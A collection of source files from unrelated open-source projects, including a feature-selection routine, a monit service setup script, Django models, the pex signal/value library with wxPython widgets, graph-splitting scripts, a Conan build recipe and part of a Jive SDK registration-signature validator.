max_selected_features=max_selected_features,
l2_penalty=l2_penalty,
rescale=rescale,
max_iter=max_iter,
convergence_tol=convergence_tol,
max_seconds_per_cut=max_seconds_per_cut,
random_state=random_state,
verbose=verbose
)
def _initialize_support(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
return np.isin(
np.arange(self.n_features_in_),
np.argsort(
-np.abs(Ridge(alpha=self.l2_penalty * len(X) / self.max_selected_features).fit(X=X, y=y).coef_)
)[:self.max_selected_features]
)
def _compute_weights_for_subset(self, X_subset: np.ndarray, y: np.ndarray) -> np.ndarray:
return np.matmul(
np.linalg.inv(
2 * self.l2_penalty * X_subset.shape[0] / self.max_selected_features * np.eye(X_subset.shape[1])
+ np.matmul(X_subset.T, X_subset)
),
np.matmul(X_subset.T, y)
)
def _compute_dual_variables(self, X_subset: np.ndarray, y: np.ndarray, weights_subset: np.ndarray) -> np.ndarray:
return y - np.matmul(X_subset, weights_subset)
def _compute_objective_value(self, X_subset: np.ndarray, y: np.ndarray, dual_variables: np.ndarray) -> float:
return 0.5 * np.dot(y, dual_variables)
``` |
{
"source": "jivank/qmonit",
"score": 2
} |
#### File: jivank/qmonit/qmonit.py
```python
import os
import sys
import re
import subprocess
import shutil
QMONIT_DIR = '/opt/qmonit'
try:
if not os.path.exists(QMONIT_DIR):
os.makedirs(QMONIT_DIR)
except OSError as os_error:
sys.exit("Please use a privileged account")
def make_executable(path):
mode = os.stat(path).st_mode
mode |= (mode & 0o444) >> 2 # copy R bits to X
os.chmod(path, mode)
def find_monit_dir():
reg = re.compile(r'include (\/.+)\*')
with open('/etc/monit/monitrc') as monitrc:
for line in monitrc:
results = reg.findall(line)
if results:
return results[0]
sys.exit("Unable to find monit config folder")
def build_script(service_name, app_path, args, helper_script):
script = '''#!/bin/bash
{} {} &
echo $! > /opt/qmonit/{}/{}.pid'''.format(app_path, args, service_name, service_name)
with open(helper_script, 'w') as f:
f.write(script)
make_executable(helper_script)
def build_monit(monit_path, service_name, helper_script,pidfile):
monit = '''check process {} with pidfile {}
start program = "{}" as uid {} and gid {}
stop program = "/bin/kill `{}`" as uid {} and gid {} '''.format(
service_name,
pidfile,
helper_script,
service_name,
service_name,
pidfile,
service_name,
service_name)
monitfile = os.path.join(monit_path, service_name)
with open(monitfile, 'w') as f:
f.write(monit)
def create_user(service_name):
subprocess.check_output("useradd -r --shell /bin/false {}".format(service_name).split())
def chown_folder(service_name, qmonit_service_dir):
command = "chown -R {}:{} {}".format(service_name, service_name, qmonit_service_dir).split()
subprocess.check_output(command)
def determine_app_path(executable):
if os.path.isfile(executable):
return os.path.abspath(executable)
return shutil.which(executable) or exit('')
if __name__ == '__main__':
ARGUMENTS = dict(zip(['file', 'service', 'exe', 'args'], sys.argv))
if not ARGUMENTS.get('exe') or not ARGUMENTS.get('service'):
sys.exit('usage: qmonit.py <service name> <executable> "arg1 arg2 arg3"')
MONIT_PATH = find_monit_dir()
SERVICE_NAME = ARGUMENTS.get('service')
SERVICE_QM_DIR = os.path.join('/opt/qmonit', SERVICE_NAME)
FULL_APP_PATH = determine_app_path(ARGUMENTS['exe'])
ARGS = ARGUMENTS.get('args') or ''
HELPER_SCRIPT = os.path.join(QMONIT_DIR, SERVICE_NAME, SERVICE_NAME + '.sh')
PID_FILE = os.path.join('/opt/qmonit/', SERVICE_NAME, SERVICE_NAME+'.pid')
os.makedirs(SERVICE_QM_DIR)
build_script(SERVICE_NAME, FULL_APP_PATH, ARGS, HELPER_SCRIPT)
build_monit(MONIT_PATH, SERVICE_NAME, HELPER_SCRIPT, PID_FILE)
create_user(SERVICE_NAME)
chown_folder(SERVICE_NAME, SERVICE_QM_DIR)
print('Done')
``` |
{
"source": "jivanyan/salesior",
"score": 2
} |
#### File: jivanyan/salesior/populate.py
```python
import os
#settings.configure()
def populate_patrons():
add_user("x", "test")
def add_user(name, pwd):
u = User.objects.get_or_create(username = name, password = <PASSWORD>)
return u
def add_five_more_patrons():
#p = Patron.objects.filter
if __name__ == '__main__':
print "Starting commerce population script..."
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'website.settings')
from django.contrib.auth.models import User
from .website.apps.patron.models import *
from .website.apps.venue.models import *
populate_patrons()
#populate_venues()
print "FINISH"
```
#### File: bonus/algorithms/base.py
```python
import re
class BonusAlgorithmBase(object):
"""
Interface for all Bonus Plans.
"""
def referral_bonus(self, referer, refered, venue):
"""
Returns a tuple with a Bonus for referrer, and a Bonus
for referred in that order.
"""
raise NotImplementedError()
@property
def enum_value_name(self):
name = self.__class__.__name__
# add an underline in before un uppercase caracter if it's not after
# another uppercase caracter.
# e.g.
# >> re.sub('(?<!^)(?=[A-Z])(?<![A-Z])', '_', 'AbcdEFGhIJ')
# == Abcd_EFGh_IJ
return re.sub('(?<!^)(?=[A-Z])(?<![A-Z])', '_', name).upper()
```
#### File: apps/message/models.py
```python
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class MessageManager(models.Manager):
def inbox_for(self, user):
return self.filter(recipient = user, deleted_by_recipient_at__isnull = True,)
def outbox_for(self, user):
return self.filter(sender = user, deleted_by_sender_at__isnull = True,)
def trash_for(self, user):
pass
class Message(models.Model):
subject = models.CharField(max_length = 120)
body = models.TextField()
sender = models.ForeignKey(User, related_name = 'sent_messages')
recipient = models.ForeignKey(User, related_name = 'received_messages')
sent_at = models.DateTimeField(null = True, blank = True)
read_at = models.DateTimeField(null = True, blank = True)
deleted_by_sender_at = models.DateTimeField(null=True, blank=True)
deleted_by_recipient_at = models.DateTimeField(null=True, blank=True)
objects = MessageManager()
def new(self):
if self.read_at is not None:
return False
return True
def __unicode__(self):
return self.subject
class Meta:
ordering = ['-sent_at']
def inbox_count_for(user):
"""
returns the number of unread messages for the given user but does not
mark them seen
"""
return Message.objects.filter(recipient=user, read_at__isnull=True, deleted_by_recipient_at__isnull=True).count()
``` |
{
"source": "Jive-Faury/TouchDesigner_Tools",
"score": 3
} |
#### File: TouchDesigner_Tools/TD_Dev/mixerEXT.py
```python
class mixerEXT:
"""
mixer description
"""
def __init__(self, ownerComp):
# The component to which this extension is attached
self.ownerComp = ownerComp
self.metaItems = ['length', 'sample_rate']
self.currentSlot = 'slotA'
def addItem(self):
"""
add playlist item in the playlist DAT
"""
for row in iop.MediaDat.rows('*')[1:]:
items = self.getMeta(row)
debug(items)
iop.playlist.appendRow(row + items)
def getMeta(seld, mediaRow):
"""
return a mete list of media data for the specified media row
"""
iop.MetaTop.par.file = mediaRow[1]
iop.MetaTop.par.reload.pulse()
items = []
for item in self.metaItems:
items.append(iop.MetaChop[item].eval())
return items
def clearPlayList(self):
"""
clear playlistDat table
"""
iop.playlistDat.clear()
def onSelectRow(self,info):
"""
handles the onSelectRow callback for the lister
"""
nextSlot = 'slotB' if self.currentSlot == 'slotA' else 'slotA'
player = getattr(iop, self.currentSlot)
mediaPath = info['rowData']['rowObject'][1]
player.par.file = mediaPath
player.par.reload.pulse()
self.cross()
self.currentSlot = nextSlot
def onClick(self, info):
if info['colName'] == 'Delete'
debug(info)
def cross(self):
self.ownerComp.Mixab = True if self.currentSlot == 'slotB' else False
``` |
{
"source": "JiveHelix/pex",
"score": 3
} |
#### File: python/pex/compound_creator.py
```python
from __future__ import annotations
from typing import Generic, TypeVar
T = TypeVar('T')
class CompoundCreator(Generic[T]):
@classmethod
def Create(
class_,
name: str,
value: T) -> CompoundCreator[T]:
raise NotImplemented("Create must be overridden")
```
#### File: python/pex/range.py
```python
from __future__ import annotations
from typing import Generic, TypeVar, Callable, Optional, cast, Type
import attr
from .value import (
ModelValue,
InterfaceValue,
FilteredReadOnlyValue,
FilteredInterfaceValue,
ValueContext)
from .types import ValueCallback
from .transform import TransformModel, TransformInterface
from .initializers import InitializeInterface
from .compound_creator import CompoundCreator
ModelNumber = TypeVar('ModelNumber', int, float)
InterfaceNumber = TypeVar('InterfaceNumber', int, float)
@attr.s(auto_attribs=True)
class Range(Generic[ModelNumber]):
value: ModelNumber
minimum: ModelNumber
maximum: ModelNumber
@TransformModel(Range, ModelValue.Create, init=True)
class RangeModel(CompoundCreator[ModelNumber]):
@classmethod
def Create(
class_,
name: str,
value: ModelNumber) -> RangeModel[ModelNumber]:
"""
Uses the value as the default minimum and maximum.
Use SetMinimum and SetMaximum to make this instance useful.
"""
return RangeModel(Range(value, value, value), name)
def SetMinimum(self, minimum: ModelNumber) -> None:
minimum = min(minimum, self.maximum.Get())
# Delay publishing the new minimum until value has been adjusted.
with ValueContext(self.minimum) as context:
context.Set(minimum)
if self.value.Get() < minimum:
self.value.Set(minimum)
def SetMaximum(self, maximum: ModelNumber) -> None:
maximum = max(maximum, self.minimum.Get())
# Delay publishing the new maximum until value has been adjusted.
with ValueContext(self.maximum) as context:
context.Set(maximum)
if self.value.Get() > maximum:
self.value.Set(maximum)
def Set(self, value: ModelNumber) -> None:
value = max(
self.minimum.Get(),
min(value, self.maximum.Get()))
self.value.Set(value)
def SetWithoutNotify_(self, value: ModelNumber) -> None:
value = max(
self.minimum.Get(),
min(value, self.maximum.Get()))
self.value.SetWithoutNotify_(value)
def Notify_(self) -> None:
self.value.Notify_()
def Connect(self, callback: ValueCallback[ModelNumber]) -> None:
self.value.Connect(callback)
def Disconnect(self, callback: ValueCallback) -> None:
self.value.Disconnect(callback)
def Get(self) -> ModelNumber:
return self.value.Get()
@TransformInterface(RangeModel, InterfaceValue.Create, init=False)
@attr.s(auto_attribs=True, init=False)
class RangeInterface(Generic[ModelNumber, InterfaceNumber]):
value: FilteredInterfaceValue[ModelNumber, InterfaceNumber]
minimum: FilteredReadOnlyValue[ModelNumber, InterfaceNumber]
maximum: FilteredReadOnlyValue[ModelNumber, InterfaceNumber]
def __init__(
self,
rangeModel: Optional[RangeModel[ModelNumber]],
name: Optional[str] = None) -> None:
if rangeModel is not None:
InitializeInterface(
self,
cast(RangeModel[ModelNumber], rangeModel),
name)
@classmethod
def Create(
class_: Type[RangeInterface[ModelNumber, InterfaceNumber]],
model: RangeModel[ModelNumber],
namePrefix: Optional[str] = None) \
-> RangeInterface[ModelNumber, InterfaceNumber]:
return class_(model, namePrefix)
def AttachFilterOnGet(
self,
filterOnGet: Callable[[ModelNumber], InterfaceNumber]) -> None:
self.value.AttachFilterOnGet(filterOnGet)
self.minimum.AttachFilterOnGet(filterOnGet)
self.maximum.AttachFilterOnGet(filterOnGet)
def AttachFilterOnSet(
self,
filterOnSet: Callable[[InterfaceNumber], ModelNumber]) -> None:
self.value.AttachFilterOnSet(filterOnSet)
class RangeFactory(Generic[ModelNumber]):
value_: ModelNumber
minimum_: ModelNumber
maximum_: ModelNumber
def __init__(
self,
value: ModelNumber,
minimum: ModelNumber,
maximum: ModelNumber) -> None:
self.value_ = value
self.minimum_ = minimum
self.maximum_ = maximum
def __call__(self) -> Range[ModelNumber]:
return Range(self.value_, self.minimum_, self.maximum_)
```
#### File: python/pex/reference.py
```python
from __future__ import annotations
from typing import Callable, Any, Optional
from inspect import ismethod
from weakref import WeakMethod, ref
from .types import CallbackType, Reference
def MakeReference(
callback: CallbackType,
onFinalize: Optional[Callable[[Reference[CallbackType]], Any]]) \
-> Reference[CallbackType]:
if ismethod(callback):
return WeakMethod(callback, onFinalize)
else:
return ref(callback, onFinalize)
def GetReference(callback: CallbackType) -> Reference[CallbackType]:
return MakeReference(callback, None)
```
#### File: python/pex/transform_common.py
```python
from __future__ import annotations
from typing import (
TypeVar,
Callable,
Type,
Any,
Optional,
List,
Set,
ClassVar,
Dict,
Generic,
Union,
DefaultDict)
import types
import inspect
from collections import defaultdict
import attr
T = TypeVar("T")
Prototype = TypeVar("Prototype")
Attribute = TypeVar("Attribute")
# A global record of transformed prototypes
classByPrototypeNameBySeries: DefaultDict[str, Dict[str, Type[Any]]] = \
defaultdict(dict)
def GetHasName(attributeMaker: Callable[..., Attribute]) -> bool:
""" @return True if 'name' is the first parameter """
if isinstance(attributeMaker, type):
# this is a class
try: # type: ignore
init = getattr(attributeMaker, '__init__')
except AttributeError:
return False
signature = inspect.signature(init)
else:
signature = inspect.signature(attributeMaker)
return next(iter(signature.parameters.keys())) == 'name'
def GetClassName(class_: Type[Any]) -> str:
return "{}.{}".format(class_.__module__, class_.__name__)
def GetMemberType(
prototype: Union[Any, Type[Any]],
memberName: str) -> Type[Any]:
return type(getattr(prototype, memberName))
def GetMemberTypeName(
prototype: Union[Any, Type[Any]],
memberName: str) -> str:
return GetClassName(GetMemberType(prototype, memberName))
def GetDecoratedClass(class_: Type[Any], series: str = 'model') -> Type[Any]:
typeName = GetClassName(class_)
classByPrototypeName = classByPrototypeNameBySeries[series]
return classByPrototypeName[typeName]
def IsPrototype(class_: Type[Any], series: str = 'model') -> bool:
if series not in classByPrototypeNameBySeries:
return False
typeName = GetClassName(class_)
return typeName in classByPrototypeNameBySeries[series]
def GetTransformedInstanceVars(class_: Type[Any]) -> List[str]:
return class_.__transform_vars__
def IsTransformed(class_: Type[Any]) -> bool:
return hasattr(class_, "__transform_vars__")
def GetClassVars(class_: Type[Any]) -> List[str]:
return class_.__transform_class_vars__
```
#### File: python/pex/type_inspection.py
```python
from __future__ import annotations
from functools import lru_cache
import sys
from typing import (
Any,
Type,
TypeVar,
Dict,
ForwardRef,
Union,
cast,
Hashable)
import typing
from .signal import Signal
from .value import ModelValue, FilteredModelValue
T = TypeVar('T')
@lru_cache(32)
def GetClassNamespace_(class_: Hashable) -> Dict[str, Any]:
return vars(sys.modules[class_.__module__])
@lru_cache(32)
def GetUnsubscriptedTypeImpl(
type_: Hashable,
parentClass: Hashable) -> Type[Any]:
if isinstance(type_, type):
return cast(Type[Any], type_)
if not isinstance(type_, str):
# It's not a type and it's not a str.
# We don't know what to do with it.
raise ValueError("Bad type argument: {}".format(type_))
forwardRef = ForwardRef(type_, is_argument=False)
# pylint: disable=protected-access
evaluated = forwardRef._evaluate(GetClassNamespace_(parentClass), None)
if evaluated is None:
raise RuntimeError("Unable to resolve type {}".format(type_))
if isinstance(evaluated, typing._GenericAlias): # type: ignore
return evaluated.__origin__
else:
return evaluated
@lru_cache(32)
def GetFirstTypeArgImpl_(type_: Hashable, parentClass: Type[Any]) -> Type[Any]:
""" Returns the actual type, even if type_ is a string. """
if isinstance(type_, type):
return type_
if not isinstance(type_, str):
# It's not a type and it's not a str.
# We don't know what to do with it.
raise ValueError("Bad type argument: {}".format(type_))
forwardRef = ForwardRef(type_, is_argument=False)
# pylint: disable=protected-access
evaluated = forwardRef._evaluate(GetClassNamespace_(parentClass), None)
if evaluated is None:
raise RuntimeError("Unable to resolve type {}".format(type_))
if isinstance(evaluated, typing._GenericAlias): # type: ignore
if isinstance(
evaluated.__args__[0], typing._GenericAlias): # type: ignore
# Now use the origin to retrieve the default value type.
return evaluated.__args__[0].__origin__
return evaluated.__args__[0]
return evaluated
def GetUnsubscriptedType(type_: Type[Any], parentClass: Type[Any]) -> Type[Any]:
"""
Return the unsubscripted type, or if the type_ argument is not
a GenericAlias, returns the type_.
GetUnsbuscriptedType(List[int]) -> List
GetUnsbuscriptedType(ModelValue[str]) -> ModelValue
GetUnsbuscriptedType(float) -> float
"""
# I cannot see how mypy/typeshed/python can allow me to declare that I am
# passing a union of hashable types.
# Explicitly cast them here.
return GetUnsubscriptedTypeImpl(
cast(Hashable, type_),
cast(Hashable, parentClass))
def GetFirstTypeArg(
type_: Union[Type[T], str],
parentClass: Type[Any]) -> Type[T]:
return GetFirstTypeArgImpl_(
cast(Hashable, type_),
cast(Hashable, parentClass))
```
#### File: pex/wx/add_label.py
```python
from typing import Any
import wx
def AddLabel(
parent: wx.Window,
label:str,
widget: Any,
style: Any) -> wx.Sizer:
label = wx.StaticText(parent, label=label)
sizer = wx.BoxSizer(style)
if style == wx.HORIZONTAL:
flag = wx.RIGHT
else:
flag = wx.BOTTOM | wx.EXPAND
sizer.AddMany((
(label, 0, flag, 5),
(widget, 1, flag)))
return sizer
```
#### File: pex/wx/shortcut.py
```python
from typing import (
Any,
Callable,
Iterable,
Union,
Tuple,
List,
Dict)
import itertools
import wx
import attr
from typing_extensions import Protocol
from .. import pex
keyStringByWxDefine = {
wx.WXK_DELETE: 'DELETE',
wx.WXK_BACK: 'BACK',
wx.WXK_INSERT: 'INSERT',
wx.WXK_RETURN: 'RETURN',
wx.WXK_PAGEUP: 'PGUP',
wx.WXK_PAGEDOWN: 'PGDN',
wx.WXK_LEFT: 'LEFT',
wx.WXK_RIGHT: 'RIGHT',
wx.WXK_UP: 'UP',
wx.WXK_DOWN: 'DOWN',
wx.WXK_HOME: 'HOME',
wx.WXK_END: 'END',
wx.WXK_SPACE: 'SPACE',
wx.WXK_TAB: 'TAB',
wx.WXK_ESCAPE: 'ESCAPE'}
modifierStringByWxAccel = {
wx.ACCEL_NORMAL: '',
wx.ACCEL_SHIFT: 'SHIFT',
wx.ACCEL_CMD: 'CTRL',
wx.ACCEL_ALT: 'ALT'}
modifierOrder = (wx.ACCEL_CMD, wx.ACCEL_SHIFT, wx.ACCEL_ALT)
class Key:
asciiCode_: int
def __init__(self, character: Union[int, str]) -> None:
if isinstance(character, int):
self.asciiCode_ = character
else:
self.asciiCode_ = ord(character)
def __repr__(self) -> str:
return keyStringByWxDefine.get(
self.asciiCode_,
chr(self.asciiCode_))
def __int__(self) -> int:
return self.asciiCode_
def GetModifierString(modifierBitfield: int) -> str:
"""
Returns a string describing all modifiers in the bitfield.
modifierBitfield may be bitwise combination of modifiers. Check the
modifierBitfield against each accel define to build the description string.
"""
return '+'.join([
modifierStringByWxAccel[modifier]
for modifier in modifierOrder
if modifierBitfield & modifier])
@attr.s(auto_attribs=True, eq=False, slots=True)
class Shortcut:
signal: pex.InterfaceSignal
modifier: int
ascii: str
description: str
longDescription: str
@property
def name(self) -> str:
return self.signal.name
class ShortcutMethods:
signal_: pex.InterfaceSignal
id_: int
modifier_: int
key_: Key
description_: str
longDescription_: str
def __init__(self, shortcut: Shortcut) -> None:
self.signal_ = shortcut.signal
self.id_ = wx.Window.NewControlId()
self.modifier_ = shortcut.modifier
self.key_ = Key(shortcut.ascii)
self.description_ = shortcut.description
self.longDescription_ = shortcut.longDescription
def AddToMenu(self, menu: wx.Menu) -> None:
menu.Append(
wx.MenuItem(
menu,
self.id_,
self.GetMenuItemLabel(),
self.longDescription_))
def GetMenuItemLabel(self) -> str:
modifier = GetModifierString(self.modifier_)
if len(modifier) > 0:
return u'{}\t{}+{}'.format(self.description_, modifier, self.key_)
else:
return u'{}\t{}'.format(self.description_, self.key_)
def GetAcceleratorTableEntry(self) -> Tuple[int, int, int]:
return (self.modifier_, int(self.key_), self.id_)
def OnEventMenu(self, ignored: wx.CommandEvent) -> None:
self.signal_.Trigger()
def GetId(self) -> int:
return self.id_
class HasWxShortcutMethods(Protocol):
acceleratorShortcutMethods_: List[ShortcutMethods]
menuShortcutMethodsByName_: Dict[str, ShortcutMethods]
acceleratorTable_: wx.AcceleratorTable
def SetAcceleratorTable(
self,
acceleratorTable_: wx.AcceleratorTable) -> None:
...
def Bind(
self,
binder: Any,
callback: Callable[[wx.CommandEvent], None],
id: int = wx.ID_ANY) -> None: # pylint: disable=redefined-builtin
...
class ShortcutMixin:
def __init__(
self: HasWxShortcutMethods,
acceleratorShortcuts: Iterable[Shortcut],
menuShortcuts: Iterable[Shortcut]):
self.acceleratorShortcutMethods_ = [
ShortcutMethods(shortcut) for shortcut in acceleratorShortcuts]
self.menuShortcutMethodsByName_ = {
shortcut.name: ShortcutMethods(shortcut)
for shortcut in menuShortcuts}
self.acceleratorTable_ = wx.AcceleratorTable([
shortcutMethods.GetAcceleratorTableEntry()
for shortcutMethods in self.acceleratorShortcutMethods_])
self.SetAcceleratorTable(self.acceleratorTable_)
for shortcut in itertools.chain(
self.acceleratorShortcutMethods_,
self.menuShortcutMethodsByName_.values()):
self.Bind(
wx.EVT_MENU,
shortcut.OnEventMenu,
id=shortcut.GetId())
def AddShortcutToMenu(self, shortcutName: str, menu: wx.Menu) -> None:
self.menuShortcutMethodsByName_[shortcutName].AddToMenu(menu)
```
#### File: wx/utility/number_validator.py
```python
from __future__ import annotations
import string
import wx
class NumberValidator(wx.Validator):
def __init__(self) -> None:
super(NumberValidator, self).__init__()
self.Bind(wx.EVT_CHAR, self.OnChar_)
def Clone(self) -> NumberValidator:
return NumberValidator()
def Validate(self, ignored: wx.Window) -> bool:
value = self.GetWindow().GetValue()
try:
float(value)
except ValueError:
return False
return True
def OnChar_(self, wxEvent: wx.CommandEvent) -> None:
keyCode = wxEvent.GetKeyCode()
if keyCode < wx.WXK_SPACE or keyCode == wx.WXK_DELETE or keyCode > 255:
wxEvent.Skip()
return
if chr(keyCode) in string.digits or chr(keyCode) in ('.', '-'):
# Allow this character to propagate
wxEvent.Skip()
return
if not wx.Validator.IsSilent():
wx.Bell()
```
#### File: pex/wx/window.py
```python
from typing import List
import abc
import wx
from .. import pex
class Window:
""" A mixin that disconnects pex when the window is destroyed. """
tubes_: List[pex.HasDisconnectAll]
wxId_: int
def __init__(self: wx.Window, tubes: List[pex.HasDisconnectAll]) -> None:
self.tubes_ = tubes
self.wxId_ = self.GetId()
self.Bind(
wx.EVT_WINDOW_DESTROY,
self.OnWindowDestroy_,
id=self.wxId_)
def OnWindowDestroy_(self, wxEvent: wx.CommandEvent) -> None:
if wxEvent.GetId() != self.wxId_:
print("WARNING: Received EVT_WINDOW_DESTROY for another window!")
return
wxEvent.Skip()
for tube in self.tubes_:
tube.DisconnectAll()
```
#### File: pex/wx/wx_chooser_adapter.py
```python
from __future__ import annotations
from typing import Generic, Any, List, Callable
from ..proxy import FilterProxy
from ..reference import Reference
from ..types import ValueType
def DefaultToString(value: ValueType) -> str:
return str(value)
class WxChooserAdapter(Generic[ValueType]):
toString_: FilterProxy[ValueType, str]
def __init__(
self,
toString: Callable[[ValueType], str] = DefaultToString) -> None:
self.toString_ = FilterProxy.Create(
toString,
self.RestoreDefaultToString_)
def ToString(self, value: ValueType) -> str:
return self.toString_(value)
def GetSelectionAsString(self, index: int, choices: List[ValueType]) -> str:
return self.toString_(choices[index])
def GetChoicesAsStrings(self, choices: List[ValueType]) -> List[str]:
return [self.toString_(choice) for choice in choices]
def RestoreDefaultToString_(
self,
ignored: Reference[Callable[[ValueType], str]]) -> None:
self.toString_ = FilterProxy.Create(DefaultToString, None)
``` |
{
"source": "jiverson002/bdmpi",
"score": 3
} |
#### File: graphdiameter/scripts/pair2adjacency.py
```python
import sys
from optparse import OptionParser
# Adjacencies dictionary
# ----------------------
# The key is the node ID, the value is
# a pair: the first position is a list of the outgoing neighbours, the second is
# a list of the incoming neighbours
adjacencies = dict()
# Adding edges to the dictionary
# ------------------------------
#
# Adds an edge between `u` and `v`. If the parameter `directed` is set to `True`
# then the edge is directed.
def add_edge(u, v, directed = False):
# Add `v` to the outgoing nodes of `u`
if u in adjacencies:
adjacencies[u][0].append(v)
else:
adjacencies[u] = ([v],[])
# Add `u` to the incoming nodes of `v`
if v in adjacencies:
adjacencies[v][1].append(u)
else:
adjacencies[v] = ([],[u])
# If the graph si undirected
if not directed:
# Add `u` to the outgoing nodes of `v`
if v in adjacencies:
adjacencies[v][0].append(u)
else:
adjacencies[v] = ([u],[])
# Add `v` to the incoming nodes of `u`
if u in adjacencies:
adjacencies[u][1].append(v)
else:
adjacencies[u] = ([],[u])
# Converting between representations
# ----------------------------------
#
# Reads each line coming from standard input and updates the `adjacency` dictionary
# using the `add_edge` function.
#
# Once the dictionary is populated, then its contents are printed to standard
# output in the format expected by `gdem`.
def convert(directed = False):
for line in sys.stdin.readlines():
edge = line.split()
if len(edge) != 2:
raise Exception("edge with a number of nodes different than 2 " + str(edge))
add_edge(int(edge[0]), int(edge[1]), directed)
for (node_id, (out_edges, in_edges)) in adjacencies.iteritems():
sys.stdout.write("%d |" % (node_id))
for v in out_edges:
sys.stdout.write(" %d" % (v))
sys.stdout.write(" |")
for v in in_edges:
sys.stdout.write(" %d" % (v))
sys.stdout.write("\n")
# Main function
# -------------
#
# The main entry point of the script: sets a command line option (`-d`)
# and invokes `convert`
def main():
parser = OptionParser()
parser.add_option("-d", "--directed",
action="store_true",
dest="directed", default=False,
help="Create a directed graph")
(options, args) = parser.parse_args()
sys.stderr.write("Directed graph? " + str(options.directed) + "\n")
convert(options.directed)
if __name__ == "__main__":
main()
```
#### File: graphdiameter/scripts/splitInput.py
```python
import argparse
import sys
import os
def open_files(args):
os.mkdir(args.directory)
os.chdir(args.directory)
files = []
for i in range(args.num_processors):
filename = args.basename + '-' + str(i) + '.adj'
print 'Opening file', filename
f = open(filename, mode='w')
files.append(f)
return files
def close_files(files):
for f in files:
print 'Closing file', f.name
f.close()
def get_processor_id(node_id, num_processors):
return int(node_id) % num_processors
def split_graph(args):
files = open_files(args)
num_processors = args.num_processors
for line in sys.stdin:
node_id = line.split('|')[0]
processor_id = get_processor_id(node_id, num_processors)
files[processor_id].write(line)
close_files(files)
def main():
argParser = argparse.ArgumentParser(description='Splits a graph file.')
argParser.add_argument('-b', '--basename', dest='basename',
default='graph', metavar='NAME',
help='The base name of the output files.')
argParser.add_argument('-n', metavar='N', dest='num_processors',
default=1, type=int,
help='The number of processors, defaults to one.')
argParser.add_argument('-d', '--dir', dest='directory',
default='.', metavar='DIR',
help=
'The directory where output files will be placed in')
args = argParser.parse_args()
split_graph(args)
if __name__ == '__main__':
main()
``` |
{
"source": "jiverson002/GKlib-conan",
"score": 2
} |
#### File: jiverson002/GKlib-conan/conanfile.py
```python
from conans import ConanFile, CMake, tools
class GKlibConan(ConanFile):
name = "GKlib"
version = "0.0.1"
license = "MIT"
author = "<NAME> (<EMAIL>)"
url = "https://github.com/jiverson002/GKlib"
homepage = "https://github.com/jiverson002/GKlib"
description = "A library of various helper routines and frameworks used by many of the lab's software."
topics = ("utilities")
settings = "os", "compiler", "build_type", "arch"
options = {
"shared": [True, False],
"fPIC": [True, False],
"visibility": ["hidden", "default"],
"apps": [True, False]
}
default_options = {
"shared": False,
"fPIC": True,
"visibility": "default", # FIXME: hidden causes build to fail
"apps": True
}
exports = ["LICENSE"]
scm = {
"type": "git",
"url": "https://github.com/jiverson002/GKlib.git",
"revision": "feature/modern-cmake-pr"
}
def build(self):
cmake = CMake(self)
cmake.definitions["CMAKE_WINDOWS_EXPORT_ALL_SYMBOLS"] = True
cmake.definitions["CMAKE_C_VISIBILITY_PRESET"] = self.options.visibility
cmake.definitions["GKLIB_BUILD_APPS"] = self.options.apps
#cmake.verbose = True
cmake.configure()
cmake.build()
#cmake.test()
cmake.install()
def package(self):
self.copy("*.h", dst="include/GKlib", src="include")
self.copy("*GKlib.lib", dst="lib", keep_path=False)
self.copy("*.dll", dst="bin", keep_path=False)
self.copy("*.so", dst="lib", keep_path=False)
self.copy("*.dylib", dst="lib", keep_path=False)
self.copy("*.a", dst="lib", keep_path=False)
``` |
{
"source": "jiveshs98/Python-Dictionary",
"score": 4
} |
#### File: jiveshs98/Python-Dictionary/dictionary.py
```python
import json
from difflib import get_close_matches
data= json.load(open("data.json"))
def dictionary(key):
key= key.lower()
if key in data: # If word is present in dictionary
return data[key]
elif key.upper() in data: # If there is any acronym like USA, NATO, UN, IPC etc
return data[key.upper()]
elif key.title() in data: # If there is a word starting with a capital letter such as nouns: Delhi
return data[key.title()]
elif len(get_close_matches(key,data.keys()))>0: # If there is any possibility of a similar word
match= get_close_matches(key,data.keys())[0]
ch= input("\nDid you mean %s? Enter 'y' for yes and 'n' for no : " % match)
ch= ch.upper()
if ch == 'Y':
return data[match]
elif ch == 'N':
return "Sorry! This word doesn't exist. Please double check it.\n"
else:
return "Invalid response!!!\n"
else:
return "Sorry! This word doesn't exist. Please double check it.\n"
word= input("\nEnter a word: ")
meaning= dictionary(word)
print("\n")
if type(meaning) == list:
for i in meaning:
print("--> %s\n"%i)
else:
print(meaning)
``` |
{
"source": "jivesoftware/jive-sdk-python-pip",
"score": 2
} |
#### File: jive-sdk-python-pip/jive_sdk/__init__.py
```python
import hmac
import hashlib
import base64
import urllib
import json
import requests
from collections import OrderedDict
import logging
import copy
#############################################
# is_valid_registration_notification
#############################################
def is_valid_registration_notification(payload, clientSecret=None):
"""
This method implements the Jive logic to validate if an add-on registration request originates from an authentic Jive instance.
Arguments:
1) payload (REQUIRED) - The JSON structure (not a string) Jive sends to the register_url and unregister_url defined in your add-on's meta.json
{
"clientId" : "xxxxx",
"tenantId" : "xxxxx",
"jiveSignatureURL" : "xxxxx",
"clientSecret" : "xxxxx",
"jiveSignature" : "xxxxx",
"jiveUrl" : "xxxxx",
"timestamp" : "2015-10-16T18:11:11.113+0000"
}
2) clientSecret (OPTIONAL) - In the event of an UNREGISTER event, Jive will NOT send the clientSecret again. To validate, you will need to provide the clientSecret with this argument.
Examples of calls to this method include:
jive_sdk.is_valid_registration_notification(your_json) - Used for Register Events
jive_sdk.is_valid_registration_notification(your_json, clientSecret="your_secret") - Used for UNregister Events
For more details, check out the Jive Developer Community
https://community.jivesoftware.com/docs/DOC-99941
https://community.jivesoftware.com/docs/DOC-156557
"""
# NEED THESE FOR LATER
jiveSignatureURL = payload['jiveSignatureURL']
jiveSignature = payload['jiveSignature']
# MAKING A COPY
data_json = copy.deepcopy(payload)
# REMOVE JIVE SIGNATURE FROM PAYLOAD
data_json.pop('jiveSignature')
# IS THERE AN EXISTING clientSecret OUTSIDE OF THE PAYLOAD
if not clientSecret:
# THEN WE ARE A REGISTER EVENT
if not data_json['clientSecret']:
logging.warn("Registration Event with no Secret, Invalid Payload")
return False
else:
data_json['clientSecret'] = hashlib.sha256(data_json['clientSecret']).hexdigest()
else:
if 'clientSecret' in payload:
logging.warn("Client Secret already in payload, ignoring argument. Make sure you are not passing in clientId on register events")
else:
data_json['clientSecret'] = clientSecret
